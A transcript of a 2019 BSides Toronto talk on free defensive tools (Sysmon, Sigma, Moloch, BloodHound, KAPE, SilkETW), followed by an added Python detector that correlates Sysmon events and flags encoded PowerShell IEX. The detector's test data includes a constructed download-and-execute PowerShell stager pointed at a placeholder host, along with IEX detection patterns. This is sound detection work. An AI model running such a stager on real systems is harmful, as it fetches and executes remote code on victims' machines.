BSides Toronto 2019 Anton Ovrutsky

BSides Toronto, 20:17, 277 views, published 2019-10

Transcript [en]

Hey everyone, welcome to Beyond Logs: Why It's an Exciting Time to Be a Defender, with myself, Anton Ovrutsky. Before we get started with the actual content of the talk I just wanted to give a brief outline of why this talk exists and why I'm here. A couple of months ago I was lucky enough to be on the build team for C3X, which you just heard about really eloquently, and as part of that process I was telling the other build members how excited I was for the students to see the logs that we had configured for them, just because I'm a huge nerd, I love logs. So I was excited to share those with the students and for them to see what attacks look like in a network that's primarily Windows. Then from there I had a cosmic brain moment where I thought, you know, it's not just an exciting time for the students, I think it's an exciting time to be a defender in this space generally, just because there's a lot of new tooling and new data points available to people in this space, and I hope that by the end of this talk everyone agrees with me.

So with that in mind, here's what we're going to talk about. I'm going to start off with my personal favorite, Sysmon. Move on? Yeah, that's right, it's Sysmon, right. Then move on over to generic rule formats with Sigma, and the network monitoring side of things with Moloch full packet capture, then Active Directory with BloodHound, and then rounding off with KAPE and SilkETW.

So let's just start off with Sysmon. I think traditionally the view of Sysmon has been, you know, you install it on a system and it gives you a bunch of new events that you have to work with, and those events are kind of isolated from each other. I think that this image, made by Roberto Rodriguez when he worked at SpecterOps, does a really good job of showing us that Sysmon is not just a list of events; it's its own ecosystem, living and breathing, and the events are all connected to each other. At the heart of that is the process event. Some of you may have heard the concept of moving from lists to graphs when you're thinking about defensive architecture and logging and stuff like that, and I think viewing Sysmon events this way helps us drive towards that concept.

So here's how I envisioned that. The first example I'm going to go over is just image load events; these are type 7 from Sysmon. This query is just showing you, and I know it's kind of hard to see, but the text doesn't really matter, it's how it's presented that I'm driving towards. So in this case the query is just showing you what images are loaded by this executable, and in this case the executable is the SILENTTRINITY stager; it's a new C2 framework that was released in the last couple of months. So you're not looking at the events in a list format, you're looking at them in a "what was done by this process" kind of way, so it's just more helpful to look at events this way. The slides will be available after, and you can copy my query if you want.

After that, look at this same concept another way: you can combine process and network events as well to give you a really powerful view of what's going on, and in this particular case this is a Metasploit payload, so it's just using a PowerShell script. I think looking at these events this way helps you from an alarming point of view as well. So you might not want to alert every time PowerShell makes a network connection, because that probably happens pretty often, but you might want to alert if PowerShell makes a network connection with a nasty command line like this.

Taking this concept to its logical conclusion: just show me everything. This particular query is just selecting all the values that Sysmon has based on a particular process GUID, and then if there are more than two event types associated with that process GUID it's returning results. So in this particular case I ran PowerShell three times on a test system, but only one of those times was PowerShell actually doing anything malicious, and that's the bottom event there. The difference, and I know it's hard to see, is that the bottom event has a network connect event associated with the PowerShell process. So PowerShell opened and created files and connected to pipes in all the instances, but only in the third one did it actually make a network connection. So, you know, if you have tens of thousands of events to sift through, these kinds of queries can help you at least narrow down your results and give you where you want to start looking first.

We could view this a different way; this is just a force-directed visualization for Splunk, and you can see you don't necessarily know there's something malicious happening on the system, but you see that in the top left corner there's just more stuff going on. So if you're looking at, again, thousands of systems at once, views like this will help you narrow down where you want to start looking first.

So, moving over to Sigma. Sigma is just a tool that allows you to write generic rule formats, so you're not writing a query that's specific to ArcSight or Splunk or Elastic; you can write it in the Sigma format and then convert it to those other systems. I just wanted to quickly highlight one feature of Sigma, value modifiers. On the left-hand side is a Sigma rule looking for PowerShell IEX, which is Invoke-Expression, and what this rule is doing is looking for the base64 offsets of IEX. So when you convert that rule, in my case to a Splunk query, you can see on the bottom right there that it is spitting out the base64 values of IEX. So this saves you just a ton of time from having to convert your different queries from base64 or base32 or whatever you happen to be doing.

There are a bunch of other benefits to Sigma as well. Chief among them is that it's just easier to write some rules this way: you don't have to log into your SIEM, you just write the rule in a regular text editor. There's space for comments and tags, and because the rules are just text files you can treat them as config files, so if you use GitHub or something like that you can do version control and change control and all that fun stuff. Like I mentioned, the queries are portable, so you can write a query in Elastic and convert it to whatever SIEM format you like, and you can also share them for others to use, so if you write a really cool one, please share it.

Moving on to the network side of things with Moloch full packet capture. This is kind of what it looks like. It's a product made by AOL, fully open source, modular, runs Elasticsearch on the backend, and Moloch itself is meant to sit at the end of a tap or SPAN port or a network packet broker device or something like that. It just sucks in and indexes packets for you and presents them in a really, really awesome GUI that's really easy to use, and the search query for this is similar to Wireshark, so if you're used to manipulating packets or searching for packets in Wireshark, Moloch will feel at home. One of the cool features about Moloch, too, is that it's able to run the Suricata IDS on the same box, and the eve.json file that is generated by Suricata can be fed back into Moloch to enrich the packet data, so you don't just look at the IDS alert, you're looking at the full packet that the IDS rule fired on. So really handy to have, really powerful stuff.

Another feature of Moloch is that it's capable of calculating and showing JA3 hashes, and for those of you who are not aware, JA3 is a technology that will fingerprint a TLS connection. So on the left-hand side there you see the TLS handshake occurring, and the bytes of those packets are hashed together to make a JA3 hash, and you can see how Moloch displays that. What you can do from there is use a service like ja3er to look up that JA3 hash to see what client it belongs to, so in this case the JA3 hash that I'm looking at is a Meterpreter payload.

There are a bunch of additional features for Moloch as well. It has a WISE service, so it's capable of ingesting data from something like [inaudible] or a SIEM to enrich the IP data, so you're looking at host names and user names, not IP addresses. You can take in vulnerability feeds from something like AlienVault OTX as well, and you can translate those JA3 hashes to friendly names and start to baseline your environment and get an idea of what's talking to what over encrypted channels. Moloch also has YARA support, so if you're into writing YARA rules, Moloch is capable of processing those. It's modular and scalable, so if you have a network with a bunch of different segments you can put in a bunch of different Moloch capture nodes to suck in packets from all those networks. Moloch also has a really great Slack channel. I recently deployed this in my environment and, you know, being a noob, I asked a whole bunch of annoying questions and they were really kind and patient with me, so if you do decide to try it, check out the Slack channel; they're really nice and helpful. It also has an API, so you can get data back out of it, and click actions, so you're not copying and pasting values from it, you can just right-click on an element and send it to a service of your choice like VirusTotal or GreyNoise. You can do hunts as well: you can write a regex query and tell Moloch "I want to find this particular regex over X period of time," and Moloch will do that search for you. So really powerful stuff; it's kind of amazing that it's free.

So, moving over onto the AD side of things with BloodHound. BloodHound itself has traditionally been viewed as an offensive security tool, but defenders can use it as well. If you haven't seen it, this is kind of what it looks like. This screenshot here is just showing you how to get from a low-privileged user on the left-hand side to a high-privilege account on the right, in a graph format. I get asked a lot, "I've heard of BloodHound, but what do I do with it?" Chief among the things you can do with it is find a path from a low-privilege user to Domain Admin, keeping in mind that Domain Admins may not be the crown jewels in your organization. You can find Kerberoastable users, so that's service accounts, weak passwords, basically all your Active Directory secrets, especially if they have to do with group memberships or ACLs; BloodHound will do a good job of collecting that data and visualizing it for you. And this is something that I haven't personally played with too much, but if anyone out there has, please let me know: feeding the data that is collected by BloodHound back into the SIEM. My thinking there is that, you know, if you're looking at two or three accounts that potentially got compromised, you might want to know that one of those accounts is admin to a hundred systems versus one of the accounts being admin to two systems, so that's the kind of data that BloodHound can easily provide for you. Whatever you do, if you find value out of BloodHound, please donate. That's their unofficial donation channel there, the Muscular Dystrophy Association.

Moving over to KAPE now. KAPE stands for Kroll Artifact Parser and Extractor, so kind of a mouthful. It was written pretty recently by Eric Zimmerman, and this is kind of what it looks like; this is the GUI front end to KAPE, called gkape. On the left-hand side there is what you want collected from your system, so you can see by the size of the scroll bar there that KAPE is capable of collecting a whole bunch of data for you; it can do the master file table, memory dumps, all kinds of stuff. On the right-hand side is you telling KAPE what you want done with that data, how you want it parsed and processed. KAPE supports a whole bunch of different collection methods and parsers and all that, and they're always being updated. So the idea here is that you would build what you want KAPE to do via the GUI, and then you would just copy out that command line and run it on the endpoints that you believe to be potentially compromised. And this is just what the output looks like from KAPE; on the right-hand side is just the output from ipconfig, and that's that. So really simple stuff, but stuff that's actually really handy to have if you're looking at malicious things in a network.

Rounding off now with SilkETW, which is kind of the newest tool out there for us defenders. Traditionally ETW, or event trace logs in Windows, have been really hard to collect: you needed a C++ program or some kind of weird PowerShell wrapper, and even if that did work, the file that would be generated would just be a flat text file that's really difficult to work with. So one of the main features of SilkETW is that it's able to collect those event trace logs and shove them into the event log, so you can collect it with your Beats agent or [inaudible] or Splunk forwarder, whatever you're using. It also runs as a service, so if you're actually using it in production, you know, it's capable of doing that for you. In this example what I'm doing is running, excuse me, running the SILENTTRINITY stager, so the same one that I showed earlier, but this is just the PowerShell version of it and it's being reflectively loaded, so that's the new hotness in the offensive space. And this is what the output of SilkETW looks like, and I know it's hard to see, but on the right-hand side there this query is just showing you SilkETW collecting the info from the SILENTTRINITY stager, and it's loading a Boo.Lang, actually, executable or assembly. I haven't run this in production, so I haven't run this at scale and I haven't looked at the data, but I would imagine that in most environments something loading Boo assemblies in memory would be anomalous and would probably warrant a second look. I'm taking this concept further and I'm linking the ETW logs to the Sysmon logs via the process ID, so in this example I get to see the command line, the parent command line, as well as the images that were loaded, all in memory. So it's combining two really powerful sources of logs and giving you quite a bit of visibility.

So, takeaways. I hope that I went through a lot here, and I hope that everyone sees that there's a lot of stuff available in the defensive space. Most of what I covered is free, I think with the exception of Splunk; most of it is available today; most of it is pretty well documented, and if it's not, there's a Slack channel somewhere where you'll find help. So I think that there's a lot of excitement in this space because of all those factors. The second point there: I think moving from lists to graphs is incredibly powerful and necessary to catch up with all the cool stuff that the red teams are doing. The middle point there, using your data, I think that's also important; I think a lot of us probably have Sysmon logs available to us, but we're not really combining them in a way that Sysmon allows for. The second-last point there is that this is all really hard; there's a lot of configuration involved, the spaces, the little tabs, the field names, all that stuff will drive you insane. So if you're trying to replicate this in a lab or at work and you're running into problems, don't feel alone; even putting these slides together for the screenshots was incredibly difficult. And the last point there, visibility rules, and I mean that in two ways. "Rules" as in, like, "O'Doyle rules," like visibility is awesome, and then in the second sense it rules, meaning it takes priority. So if you have a network segment, or you have Windows boxes or Linux boxes or whatever, and you're not getting logs from them, start, because it's just becoming critically important. I'll end it there. Any questions?

[Applause]

Alright, very good talk, sir, thank you. I have a question for you. I think with a lot of the open-source defensive tools that are out there, which are amazing, Sysmon and all the stuff you're showing, there's still always, at the almost enterprise level, you don't always see a lot of adoption. And I think on one hand there's the, you know, "hey, well, this doesn't come with support and a license," and that weird sense of "I'd rather pay for something." But aside from that, do you think one of the problems is, because, you know, I know this can happen with Sysmon or SilkETW, it's just the matter that, as great as these tools are, at scale they start becoming very difficult to manage? Do you have an opinion on that?

Yeah. So installing Sysmon or SilkETW in a lab environment or something is, you know, pretty simple; at scale it becomes increasingly difficult. In my particular environment I run Sysmon on about a thousand endpoints, and we had to write a custom app that took care of the config changes, so the app basically goes out and looks for whether the master config file was changed, and if it was, it cycles it. So there's a lot of, just because Sysmon exists doesn't mean that you can just install it in your production environment tomorrow, unfortunately. But I think the benefit it provides, same with SilkETW, and the flexibility it offers you: I find that I've worked with a couple of EDRs and they all miss certain things, and that's okay, but you can't really write your own stuff for a lot of these EDRs, and if you can, it's an add-on product. So I think that's where the benefit of Sysmon and SilkETW and tools like that is. But yeah, if your organization doesn't like open source for whatever reason, I mean, it becomes a business decision at that point of examining the risk of getting hacked versus the risk of your open-source software crapping out on you. So I know the decision I would make personally, but every organization is different. Hope that answers the question.

By the way, good question, Lee, because my question is very similar to yours. So I use the holy trinity, which is Sysmon, osquery and Volatility. My question actually was originally similar to what Lee had asked, so my EPS in an enterprise environment is terribly low because it doesn't scale. So I'm going to change my question and ask you: what are your thoughts on actually augmenting osquery and Volatility in an enterprise model?

That's a really good question. I haven't used osquery in a production environment myself; I've played with it at home, I think it's awesome. But in terms of Volatility, I don't know; I'm not sure of your use case and I don't know how you're using that day to day. My understanding of Volatility is that it was kind of an after-the-fact thing, where you take the memory dump of a compromised system and then you analyze it after. So I don't really have a good answer to your question, but it sounds like you're doing amazing work and you're on the right track. Any more questions? Alright, well, thank you very much.
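The Sysmon correlation the talk describes (grouping events by process GUID, surfacing processes with more than two event types, and alerting only when PowerShell both makes a network connection and carries a nasty command line), together with the Sigma base64offset expansion of IEX, as an added Python example. This is not code from the talk, the slides, Sysmon or Sigma: the events, GUIDs, paths, addresses and the encoded stager command are constructed for the example, and base64offset reimplements the three-fragment expansion that Sigma's modifier produces.

```python
# Added example, not code from the talk, its slides, Sysmon or Sigma: Sysmon
# events grouped by ProcessGuid, a triage ranking by distinct event types, and
# an alert that fires only when powershell.exe both made a network connection
# and ran a suspicious command line, including IEX hidden in -EncodedCommand.
# Every event, GUID, path and address below is constructed for the example.
import base64
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def base64offset(needle: bytes) -> list:
    """The three base64 fragments that match `needle` at any byte alignment,
    as Sigma's base64offset modifier expands a value. Leading chars that depend
    on the padding and trailing chars that depend on the bytes after the
    needle are trimmed, so a fragment only ever matches the needle itself."""
    starts = (0, 2, 3)       # chars tainted by the i padding bytes
    ends = (None, -3, -2)    # chars tainted by whatever follows the needle
    return [
        base64.b64encode(b" " * i + needle).decode()[starts[i]:ends[(len(needle) + i) % 3]]
        for i in range(3)
    ]


# Sigma: CommandLine|base64offset|contains: 'IEX', for ASCII text and for the
# UTF-16LE text that powershell.exe -EncodedCommand actually carries.
IEX_FRAGMENTS = base64offset(b"IEX") + base64offset("IEX".encode("utf-16le"))
IEX_PLAIN = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)


def encode_command(text: str) -> str:
    """The argument powershell.exe -e expects: base64 of UTF-16LE text."""
    return base64.b64encode(text.encode("utf-16le")).decode()


# Constructed stager: fetch a script and run it in memory via IEX.
ENCODED = encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")

# Constructed Sysmon events. EventID 1 = process create, 3 = network connect,
# 7 = image load, 11 = file create, 17 = pipe create; {A}..{C} stand in for GUIDs.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A}", "Image": PS, "CommandLine": "powershell.exe",
     "ParentCommandLine": r"C:\Windows\explorer.exe"},
    {"EventID": 7, "ProcessGuid": "{A}", "ImageLoaded": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 17, "ProcessGuid": "{A}", "PipeName": r"\PSHost.1"},
    {"EventID": 1, "ProcessGuid": "{B}", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
     "ParentCommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -s Schedule"},
    {"EventID": 3, "ProcessGuid": "{B}", "DestinationIp": "10.0.0.5", "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{C}", "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -e {ENCODED}",
     "ParentCommandLine": r"C:\Windows\System32\cmd.exe /c start /b powershell"},
    {"EventID": 7, "ProcessGuid": "{C}", "ImageLoaded": r"C:\Windows\System32\ntdll.dll"},
    {"EventID": 17, "ProcessGuid": "{C}", "PipeName": r"\PSHost.3"},
    {"EventID": 3, "ProcessGuid": "{C}", "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"EventID": 11, "ProcessGuid": "{C}", "TargetFilename": r"C:\Users\u\AppData\Local\Temp\a.ps1"},
]


def build_process_graph(events):
    """Lists to graphs: one node per ProcessGuid, holding the set of event
    types seen for that process and the fields of its process-create event."""
    graph = defaultdict(lambda: {"types": set(), "events": []})
    for ev in events:
        node = graph[ev["ProcessGuid"]]
        node["types"].add(ev["EventID"])
        node["events"].append(ev)
        if ev["EventID"] == 1:
            node.update(Image=ev["Image"], CommandLine=ev["CommandLine"],
                        ParentCommandLine=ev["ParentCommandLine"])
    return dict(graph)


def rank_by_activity(graph, min_types=3):
    """The 'show me everything' query: processes with more than two event
    types, busiest first, as the place to start looking."""
    busy = [g for g in graph if len(graph[g]["types"]) >= min_types]
    return sorted(busy, key=lambda g: len(graph[g]["types"]), reverse=True)


def suspicious_command_line(cmd: str) -> bool:
    """Plain IEX / Invoke-Expression, or IEX at any base64 alignment."""
    return bool(IEX_PLAIN.search(cmd)) or any(f in cmd for f in IEX_FRAGMENTS)


def flag_powershell(graph):
    """Alert only on powershell.exe that both made a network connection
    (EventID 3) and ran a suspicious command line; PowerShell making a
    network connection on its own is too common to alert on."""
    hits = []
    for guid, node in graph.items():
        if not node.get("Image", "").lower().endswith("powershell.exe"):
            continue
        if 3 in node["types"] and suspicious_command_line(node["CommandLine"]):
            dests = [f"{e['DestinationIp']}:{e['DestinationPort']}"
                     for e in node["events"] if e["EventID"] == 3]
            hits.append({"ProcessGuid": guid, "Destinations": dests,
                         "ParentCommandLine": node["ParentCommandLine"]})
    return hits


if __name__ == "__main__":
    graph = build_process_graph(EVENTS)
    print("triage order:", rank_by_activity(graph))
    for hit in flag_powershell(graph):
        print("ALERT", hit)
```

Run as-is it ranks {C} ahead of {A} (process {B} has only two event types and drops out, as in the talk's "more than two event types" query) and raises exactly one alert, for {C}, whose encoded command line contains the UTF-16LE fragment of IEX and which also reached out to 203.0.113.7:443. Process {B} also made a network connection but its command line is clean, which is the false positive the combined condition is meant to avoid.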